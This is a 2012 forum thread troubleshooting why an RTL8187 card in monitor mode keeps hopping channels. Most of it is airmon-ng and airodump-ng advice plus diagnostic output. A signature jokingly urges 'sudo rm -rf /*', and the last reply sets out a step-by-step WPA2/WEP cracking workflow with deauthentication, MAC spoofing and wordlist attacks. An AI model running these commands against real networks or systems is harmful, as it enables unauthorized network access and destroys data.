Author Topic: channel set  (Read 6454 times)

Disutopia

  • Newbie
  • Posts: 12
on: June 10, 2012, 02:24:07 PM
How can I set the channel of a wireless card in monitor mode? I tried with "airmon-ng start wlan1 3" and "iwconfig wlan1 channel 3", but aireplay-ng responds that the card is on channel 1...



evilsocket

  • Full Member
  • Posts: 177
  • http://www.emoticode.net
Reply #1 on: June 10, 2012, 03:47:06 PM
Have you tried first

airmon-ng stop wlan1
airmon-ng stop mon0 (or whatever the name of your mon interface is)

and THEN

airmon-ng start wlan1 3

?



Disutopia

  • Newbie
  • Posts: 12
Reply #2 on: June 10, 2012, 04:03:06 PM
certainly!



SaThaRiel

  • Guest
Reply #3 on: June 11, 2012, 07:38:06 PM
Are you running airodump or kismet together with airmon? If yes (especially airodump-ng) you have to bind it to that channel too. Otherwise it will go through all available channels, no matter what channel you defined for airodump.

Hope that helps.



Disutopia

  • Newbie
  • Posts: 12
Reply #4 on: June 11, 2012, 08:32:29 PM
No, I'm just using aircrack suite, thank you anyway!



r083rt

  • Guest
Reply #5 on: June 11, 2012, 11:02:53 PM

Disutopia, if you are still having problems, do

airmon-ng start wlan1
airodump-ng mon0 -c 3

You will see that the monitored interface is scanning channel 3.


r083rt
« Last Edit: June 12, 2012, 12:13:06 AM by r083rt »
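As an added example (not code from this thread), a small POSIX sh check that reads the Frequency field iwconfig reports for a monitor interface, converts it to a 2.4 GHz channel number, and compares it with the channel you asked airmon-ng for. The iwconfig sample inside is constructed; mon0 and channel 3 are the values used in the thread.

```shell
#!/bin/sh
# Added example, not code from the thread: confirm which channel a
# monitor-mode interface is really on. iwconfig prints a Frequency field
# (not a channel number) for monitor interfaces, so we convert it.

# Convert a frequency in GHz as printed by iwconfig (e.g. 2.422) to a
# 2.4 GHz channel: channels 1-13 sit at 2412 + 5*(n-1) MHz, channel 14 at 2484.
freq_to_channel() {
    mhz=$(printf '%s\n' "$1" | awk '{ printf "%d", $1 * 1000 + 0.5 }')
    case "$mhz" in ''|*[!0-9]*) return 1 ;; esac
    if [ "$mhz" -eq 2484 ]; then echo 14; return 0; fi
    if [ "$mhz" -lt 2412 ] || [ "$mhz" -gt 2472 ]; then return 1; fi
    echo $(( ($mhz - 2407) / 5 ))
}

# Pull the Frequency field out of iwconfig-style output and return the channel.
channel_from_iwconfig() {
    freq=$(printf '%s\n' "$1" | sed -n 's/.*Frequency:\([0-9.]*\) GHz.*/\1/p' | head -n 1)
    [ -n "$freq" ] || return 1
    freq_to_channel "$freq"
}

# Succeed only when the interface is on the channel that was requested.
# usage: check_channel "<iwconfig output>" <expected channel>
check_channel() {
    actual=$(channel_from_iwconfig "$1") || return 2
    [ "$actual" -eq "$2" ]
}

# Constructed sample, modelled on what iwconfig prints for mon0 on channel 3.
SAMPLE_MON0='mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.422 GHz  Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off'

# On a real box (commented out so the script runs offline):
#   check_channel "$(iwconfig mon0 2>/dev/null)" 3 && echo "mon0 is on channel 3"
# If the channel keeps drifting, look for an airodump-ng started without -c,
# which hops through all channels:  ps ax | grep airodump-ng
```

Run the live check a few seconds apart: a channel that changes between runs means something else (typically a hopping airodump-ng) is retuning the card.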



ZEROF

  • Hero Member
  • Posts: 1247
Reply #6 on: June 12, 2012, 12:22:14 AM
Hi Disutopia,

Sorry, I closed the topic by mistake; thanks r083rt. Run this in a terminal and post the output on pastebin.com. Before all that, unplug your USB wireless adapter, wait 10 seconds, plug it back in, then run:

lsusb
sudo lshw -C network
iwconfig
ifconfig

Thanks!


« Last Edit: June 12, 2012, 11:41:01 AM by ZEROF »


Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


r083rt

  • Guest
Reply #7 on: June 12, 2012, 01:20:13 AM
Yes, thanks ZEROF. I should have asked the user to supply this info, as this could be down to an internal or USB adapter firmware or driver problem.


** VERY IMPORTANT **

When posting, please be specific and supply all info, i.e.

device { usb , internal }
device { model }

The more info you supply, the more accurate the solution will be.



Disutopia

  • Newbie
  • Posts: 12
Reply #8 on: June 12, 2012, 11:41:05 AM
Alfa Network AWUS036H, rtl8187 module is installed!

sinec@dante-HP-630-Notebook-PC:~$ sudo lsusb
[sudo] password for sinec:
Bus 002 Device 035: ID 0bda:8187 Realtek Semiconductor Corp. RTL8187 Wireless Adapter
Bus 002 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 002 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 001 Device 005: ID 0cf3:3005 Atheros Communications, Inc.
Bus 001 Device 003: ID 05c8:021e Cheng Uei Precision Industry Co., Ltd (Foxlink)
Bus 001 Device 002: ID 8087:0020 Intel Corp. Integrated Rate Matching Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo lshw -c network
  *-network               
       description: Ethernet interface
       product: RTL8111/8168B PCI Express Gigabit Ethernet controller
       vendor: Realtek Semiconductor Co., Ltd.
       physical id: 0
       bus info: pci@0000:01:00.0
       logical name: eth0
       version: 06
       serial: 9c:8e:99:41:46:e3
       size: 10Mbit/s
       capacity: 1Gbit/s
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation
       configuration: autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3LK-NAPI duplex=half firmware=N/A latency=0 link=no multicast=yes port=MII speed=10Mbit/s
       resources: irq:41 ioport:3000(size=256) memory:d0404000-d0404fff memory:d0400000-d0403fff
  *-network
       description: Wireless interface
       product: AR9285 Wireless Network Adapter (PCI-Express)
       vendor: Atheros Communications Inc.
       physical id: 0
       bus info: pci@0000:02:00.0
       logical name: wlan0
       version: 01
       serial: 68:a3:c4:e1:76:ba
       width: 64 bits
       clock: 33MHz
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless
       configuration: broadcast=yes driver=ath9k driverversion=3.2.9-030209-generic firmware=N/A ip=192.168.1.67 latency=0 link=yes multicast=yes wireless=IEEE 802.11bgn
       resources: irq:18 memory:d4400000-d440ffff
  *-network
       description: Wireless interface
       physical id: 2
       bus info: usb@2:1.1
       logical name: wlan1
       serial: 00:0f:04:b3:4d:76
       capabilities: ethernet physical wireless
       configuration: broadcast=yes driver=rtl8187 driverversion=3.2.9-030209-generic firmware=N/A link=no multicast=yes wireless=IEEE 802.11bg
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo iwconfig wlan1
wlan1     IEEE 802.11bg  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off
         
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$
sinec@dante-HP-630-Notebook-PC:~$ sudo ifconfig wlan1
wlan1     Link encap:Ethernet  HWaddr 00:0f:04:b3:4d:76 
          UP BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisioni:0 txqueuelen:1000
          Byte RX:0 (0.0 B)  Byte TX:0 (0.0 B)

sinec@dante-HP-630-Notebook-PC:~$



r083rt

  • Guest
Reply #9 on: June 12, 2012, 12:41:02 PM
You should have no problems with the Alfa RTL8187 USB; it's one of the most widely supported cards in Linux and all pentesting distros.

When you do the below

airmon-ng start wlan1
airodump-ng mon0 -c 3

what channel is it on ???


Please post an image of the terminal with commands and output.

Thanks

r083rt

« Last Edit: June 12, 2012, 12:43:21 PM by r083rt »



Disutopia

  • Newbie
  • Posts: 12
Reply #10 on: June 12, 2012, 02:47:23 PM
I'm not sure what you're asking me!

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11]
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng stop mon0


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11] (removed)
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng stop wlan1


Interface Chipset Driver

wlan1 RTL8187 rtl8187 - [phy11]
(monitor mode disabled)
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng start wlan1 3


Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID Name
730 avahi-daemon
731 avahi-daemon
839 NetworkManager
982 wpa_supplicant
3831 dhclient
Process with PID 3831 (dhclient) is running on interface wlan0


Interface Chipset Driver

wlan1 RTL8187 rtl8187 - [phy11]
(monitor mode enabled on mon0)
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$ sudo airmon-ng


Interface Chipset Driver

mon0 RTL8187 rtl8187 - [phy11]
wlan1 RTL8187 rtl8187 - [phy11]
wlan0 Atheros ath9k - [phy0]

sinec@dante-HP-630-Notebook-PC:~$



r083rt

  • Guest
Reply #11 on: June 12, 2012, 03:47:05 PM
It's very straightforward; you still are not doing what I asked ???
Listen with your eyes, not with your ears!


Do the following commands:

airmon-ng stop mon0
airmon-ng stop wlan1

airmon-ng start wlan1
airodump-ng mon0 -c 3

Make sure you have no other monitored interfaces up, i.e. mon1.
That goes for your internal card as well: either unload your device and reload it, i.e. ifconfig,
or turn off your computer, pull out the battery, say the alphabet backwards, stand up, spin around three times,
put your battery back in, start up your computer and hey presto, it's out of monitor mode.

If you still have trouble, press the any key !!!  :P

Now what is the output ????????? Sorry, I can't simplify this any more; it's as straightforward as it gets. This thread
is like pulling teeth, painful.

example



give me a snap shot of the terminal with airodump running
« Last Edit: June 13, 2012, 03:38:17 AM by r083rt »



ltdan

  • Guest
Reply #12 on: June 26, 2012, 04:55:39 AM
Disutopia, good question. The reason it's still channel hopping is because of the general scan of airodump, when you did the "initial target scan", let's say. So, here's what I like to do. BTW, I'm using an Alfa with the rtl8187 also, nice card; get the 9db antenna for it, really nice   ;)

first if you want you can spoof or not spoof mon0:
ifconfig
airmon-ng start wlan0
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 promisc
ifconfig mon0 up

type ifconfig again to double check it

then do yer general all AP scan:
airodump-ng mon0
at this point yer telling yer mon0 to scan ALL
so after you find the target AP, what i like to do
is hit the space bar, this pauses the scan,
copy paste the target AP info onto text file
then i just ctrl+c out i open a new window
and enter this:
airodump-ng --bssid E0:91:XX:XX:XX:7A -c 6 -w Mikeyz mon0
as ya know this starts things off on the correct channel, writes
the file to root,
then the usual from another window:
aireplay-ng -0 6 -a E0:91:XX:XX:XX:7A -c 40:30:XX:XX:XX:40 mon0
load the cap after yer handshake magically appears with no trouble whatsoever
from the universe, aircrack-ng /root/Mikeyz-01.cap
and since you have the password in your dictionary file
again, the universe is awesome like this during wpa2 craggen:
aircrack-ng -w /root/Listz/Custom-WPA /root/Mikeyz-01.cap

and if yer doin wepz:

airodump-ng mon0
locate wep target
airodump-ng --bssid 00:e0:XX:XX:XX:a3 -c 6 -w Schoolz mon0
aireplay-ng -2 -p 0841  -c 88:XX:XX:XX:80:9d -b 00:e0:XX:XX:XX:a3 mon0
aircrack-ng -b 00:e0:XX:XX:XX:a3 /root/Schoolz-01.cap

i like the -p 0841 instead of the usual
also here's incremental craggen:

sudo john --incremental:Digits --stdout:8 | sudo aircrack-ng -e (networkname) -w /root/Listz/Custom-WPA /root/

and
hammeren with pyrit:
pyrit -r /root/Handshake.cap -i /root/Desktop/wordlist.txt attack_passthrough

Welcome to BackBox, the best pentest distro and community you'll find.
I've been around on BackTrack, Blackbuntu etc. and frankly,
only my opinion, BackBox, for whatever reason, I don't know how or why,
gets the tools right, especially Metasploit, so have some fun with yer Alfa  :)